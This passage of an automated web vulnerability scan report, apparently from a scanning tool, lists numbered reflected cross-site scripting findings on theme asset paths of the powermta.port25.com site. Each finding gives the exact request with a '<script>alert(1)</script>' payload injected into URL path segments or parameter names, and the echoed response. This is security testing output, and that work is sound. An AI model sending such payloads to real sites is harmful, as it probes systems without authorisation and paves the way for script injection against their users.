HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images9ecd5\"><script>alert(1)</script>c0cab668d12 /powerMTA-logo.png" />...[SNIP]...
2.93. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-logo.png
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f50c5"><script>alert(1)</script>3efda6b8e40 was submitted in the REST URL parameter 5. This input was echoed as f50c5\"><script>alert(1)</script>3efda6b8e40 in the application's response.
Request
GET /wp-content/themes/powermta1/images/powerMTA-logo.pngf50c5"><script>alert(1)</script>3efda6b8e40 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/powerMTA-logo.pngf50c5\"><script>alert(1)</script>3efda6b8e40 " />...[SNIP]...
2.94. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-logo.png
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb97d"><script>alert(1)</script>322ec0afbc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb97d\"><script>alert(1)</script>322ec0afbc3 in the application's response.
Request
GET /wp-content/themes/powermta1/images/powerMTA-logo.png?fb97d"><script>alert(1)</script>322ec0afbc3 =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png?fb97d\"><script>alert(1)</script>322ec0afbc3 =1" />...[SNIP]...
2.95. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/submit_btn.png
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f0cc"><script>alert(1)</script>0546973a25 was submitted in the REST URL parameter 1. This input was echoed as 3f0cc\"><script>alert(1)</script>0546973a25 in the application's response.
Request
GET /wp-content3f0cc"><script>alert(1)</script>0546973a25 /themes/powermta1/images/submit_btn.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content3f0cc\"><script>alert(1)</script>0546973a25 /themes/powermta1/images/submit_btn.png" />...[SNIP]...
2.96. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/submit_btn.png
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf78d"><script>alert(1)</script>9f8ee5e2ee2 was submitted in the REST URL parameter 2. This input was echoed as bf78d\"><script>alert(1)</script>9f8ee5e2ee2 in the application's response.
Request
GET /wp-content/themesbf78d"><script>alert(1)</script>9f8ee5e2ee2 /powermta1/images/submit_btn.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesbf78d\"><script>alert(1)</script>9f8ee5e2ee2 /powermta1/images/submit_btn.png" />...[SNIP]...
2.97. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/submit_btn.png
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca8cb"><script>alert(1)</script>8923b307761 was submitted in the REST URL parameter 3. This input was echoed as ca8cb\"><script>alert(1)</script>8923b307761 in the application's response.
Request
GET /wp-content/themes/powermta1ca8cb"><script>alert(1)</script>8923b307761 /images/submit_btn.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1ca8cb\"><script>alert(1)</script>8923b307761 /images/submit_btn.png" />...[SNIP]...
2.98. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/submit_btn.png
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93bf0"><script>alert(1)</script>10282142f89 was submitted in the REST URL parameter 4. This input was echoed as 93bf0\"><script>alert(1)</script>10282142f89 in the application's response.
Request
GET /wp-content/themes/powermta1/images93bf0"><script>alert(1)</script>10282142f89 /submit_btn.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images93bf0\"><script>alert(1)</script>10282142f89 /submit_btn.png" />...[SNIP]...
2.99. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/submit_btn.png
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffaf"><script>alert(1)</script>930b5cf1384 was submitted in the REST URL parameter 5. This input was echoed as 5ffaf\"><script>alert(1)</script>930b5cf1384 in the application's response.
Request
GET /wp-content/themes/powermta1/images/submit_btn.png5ffaf"><script>alert(1)</script>930b5cf1384 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/submit_btn.png5ffaf\"><script>alert(1)</script>930b5cf1384 " />...[SNIP]...
2.100. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/submit_btn.png
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 756be"><script>alert(1)</script>465c3edf10c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 756be\"><script>alert(1)</script>465c3edf10c in the application's response.
Request
GET /wp-content/themes/powermta1/images/submit_btn.png?756be"><script>alert(1)</script>465c3edf10c =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/submit_btn.png?756be\"><script>alert(1)</script>465c3edf10c =1" />...[SNIP]...
2.101. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/tag-line.jpg
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6222"><script>alert(1)</script>e68be224d68 was submitted in the REST URL parameter 1. This input was echoed as e6222\"><script>alert(1)</script>e68be224d68 in the application's response.
Request
GET /wp-contente6222"><script>alert(1)</script>e68be224d68 /themes/powermta1/images/tag-line.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-contente6222\"><script>alert(1)</script>e68be224d68 /themes/powermta1/images/tag-line.jpg" />...[SNIP]...
2.102. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/tag-line.jpg
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 535dc"><script>alert(1)</script>7440fafeeb1 was submitted in the REST URL parameter 2. This input was echoed as 535dc\"><script>alert(1)</script>7440fafeeb1 in the application's response.
Request
GET /wp-content/themes535dc"><script>alert(1)</script>7440fafeeb1 /powermta1/images/tag-line.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes535dc\"><script>alert(1)</script>7440fafeeb1 /powermta1/images/tag-line.jpg" />...[SNIP]...
2.103. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/tag-line.jpg
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aef24"><script>alert(1)</script>c93d9ec6c5b was submitted in the REST URL parameter 3. This input was echoed as aef24\"><script>alert(1)</script>c93d9ec6c5b in the application's response.
Request
GET /wp-content/themes/powermta1aef24"><script>alert(1)</script>c93d9ec6c5b /images/tag-line.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1aef24\"><script>alert(1)</script>c93d9ec6c5b /images/tag-line.jpg" />...[SNIP]...
2.104. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/tag-line.jpg
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca44"><script>alert(1)</script>012515b499b was submitted in the REST URL parameter 4. This input was echoed as 3ca44\"><script>alert(1)</script>012515b499b in the application's response.
Request
GET /wp-content/themes/powermta1/images3ca44"><script>alert(1)</script>012515b499b /tag-line.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images3ca44\"><script>alert(1)</script>012515b499b /tag-line.jpg" />...[SNIP]...
2.105. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/tag-line.jpg
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d697"><script>alert(1)</script>30b67acaf6c was submitted in the REST URL parameter 5. This input was echoed as 2d697\"><script>alert(1)</script>30b67acaf6c in the application's response.
Request
GET /wp-content/themes/powermta1/images/tag-line.jpg2d697"><script>alert(1)</script>30b67acaf6c HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/tag-line.jpg2d697\"><script>alert(1)</script>30b67acaf6c " />...[SNIP]...
2.106. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/tag-line.jpg
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d828"><script>alert(1)</script>da0fd449c73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d828\"><script>alert(1)</script>da0fd449c73 in the application's response.
Request
GET /wp-content/themes/powermta1/images/tag-line.jpg?4d828"><script>alert(1)</script>da0fd449c73 =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/tag-line.jpg?4d828\"><script>alert(1)</script>da0fd449c73 =1" />...[SNIP]...
2.107. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/twit-logo.gif
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc7c"><script>alert(1)</script>87f91fffb0b was submitted in the REST URL parameter 1. This input was echoed as 8fc7c\"><script>alert(1)</script>87f91fffb0b in the application's response.
Request
GET /wp-content8fc7c"><script>alert(1)</script>87f91fffb0b /themes/powermta1/images/twit-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content8fc7c\"><script>alert(1)</script>87f91fffb0b /themes/powermta1/images/twit-logo.gif" />...[SNIP]...
2.108. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/twit-logo.gif
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15fe"><script>alert(1)</script>5875b7ebf80 was submitted in the REST URL parameter 2. This input was echoed as f15fe\"><script>alert(1)</script>5875b7ebf80 in the application's response.
Request
GET /wp-content/themesf15fe"><script>alert(1)</script>5875b7ebf80 /powermta1/images/twit-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesf15fe\"><script>alert(1)</script>5875b7ebf80 /powermta1/images/twit-logo.gif" />...[SNIP]...
2.109. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/twit-logo.gif
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff2d0"><script>alert(1)</script>87fe02c454b was submitted in the REST URL parameter 3. This input was echoed as ff2d0\"><script>alert(1)</script>87fe02c454b in the application's response.
Request
GET /wp-content/themes/powermta1ff2d0"><script>alert(1)</script>87fe02c454b /images/twit-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1ff2d0\"><script>alert(1)</script>87fe02c454b /images/twit-logo.gif" />...[SNIP]...
2.110. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/twit-logo.gif
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef938"><script>alert(1)</script>0c228aca5c9 was submitted in the REST URL parameter 4. This input was echoed as ef938\"><script>alert(1)</script>0c228aca5c9 in the application's response.
Request
GET /wp-content/themes/powermta1/imagesef938"><script>alert(1)</script>0c228aca5c9 /twit-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/imagesef938\"><script>alert(1)</script>0c228aca5c9 /twit-logo.gif" />...[SNIP]...
2.111. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/twit-logo.gif
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a00e"><script>alert(1)</script>434e9c13565 was submitted in the REST URL parameter 5. This input was echoed as 5a00e\"><script>alert(1)</script>434e9c13565 in the application's response.
Request
GET /wp-content/themes/powermta1/images/twit-logo.gif5a00e"><script>alert(1)</script>434e9c13565 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/twit-logo.gif5a00e\"><script>alert(1)</script>434e9c13565 " />...[SNIP]...
2.112. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/twit-logo.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ac0"><script>alert(1)</script>7f21161b3c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ac0\"><script>alert(1)</script>7f21161b3c6 in the application's response.
Request
GET /wp-content/themes/powermta1/images/twit-logo.gif?20ac0"><script>alert(1)</script>7f21161b3c6 =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/twit-logo.gif?20ac0\"><script>alert(1)</script>7f21161b3c6 =1" />...[SNIP]...
2.113. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3761b"><script>alert(1)</script>6f032161e30 was submitted in the REST URL parameter 1. This input was echoed as 3761b\"><script>alert(1)</script>6f032161e30 in the application's response.
Request
GET /wp-content3761b"><script>alert(1)</script>6f032161e30 /themes/powermta1/js/coda-slider.1.1.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69d2191ac730b69ff5b6f63a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content3761b\"><script>alert(1)</script>6f032161e30 /themes/powermta1/js/coda-slider.1.1.1.pack.js" />...[SNIP]...
2.114. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f584d"><script>alert(1)</script>87dfa82034a was submitted in the REST URL parameter 2. This input was echoed as f584d\"><script>alert(1)</script>87dfa82034a in the application's response.
Request
GET /wp-content/themesf584d"><script>alert(1)</script>87dfa82034a /powermta1/js/coda-slider.1.1.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69d2191ac730b69ff5b6f63a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesf584d\"><script>alert(1)</script>87dfa82034a /powermta1/js/coda-slider.1.1.1.pack.js" />...[SNIP]...
2.115. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4814"><script>alert(1)</script>51cc203be39 was submitted in the REST URL parameter 3. This input was echoed as f4814\"><script>alert(1)</script>51cc203be39 in the application's response.
Request
GET /wp-content/themes/powermta1f4814"><script>alert(1)</script>51cc203be39 /js/coda-slider.1.1.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69d2191ac730b69ff5b6f63a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1f4814\"><script>alert(1)</script>51cc203be39 /js/coda-slider.1.1.1.pack.js" />...[SNIP]...
2.116. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdf30"><script>alert(1)</script>ed438270590 was submitted in the REST URL parameter 4. This input was echoed as fdf30\"><script>alert(1)</script>ed438270590 in the application's response.
Request
GET /wp-content/themes/powermta1/jsfdf30"><script>alert(1)</script>ed438270590 /coda-slider.1.1.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69d2191ac730b69ff5b6f63a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/jsfdf30\"><script>alert(1)</script>ed438270590 /coda-slider.1.1.1.pack.js" />...[SNIP]...
2.117. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b822e"><script>alert(1)</script>d04d52ac82d was submitted in the REST URL parameter 5. This input was echoed as b822e\"><script>alert(1)</script>d04d52ac82d in the application's response.
Request
GET /wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.jsb822e"><script>alert(1)</script>d04d52ac82d HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69d2191ac730b69ff5b6f63a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.jsb822e\"><script>alert(1)</script>d04d52ac82d " />...[SNIP]...
2.118. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81d9c"><script>alert(1)</script>1924ea96c5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81d9c\"><script>alert(1)</script>1924ea96c5d in the application's response.
Request
GET /wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js?81d9c"><script>alert(1)</script>1924ea96c5d =1 HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69d2191ac730b69ff5b6f63a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js?81d9c\"><script>alert(1)</script>1924ea96c5d =1" />...[SNIP]...
2.119. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4082c"><script>alert(1)</script>1de928dbc8b was submitted in the REST URL parameter 1. This input was echoed as 4082c\"><script>alert(1)</script>1de928dbc8b in the application's response.
Request
GET /wp-content4082c"><script>alert(1)</script>1de928dbc8b /themes/powermta1/js/jquery-1.2.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
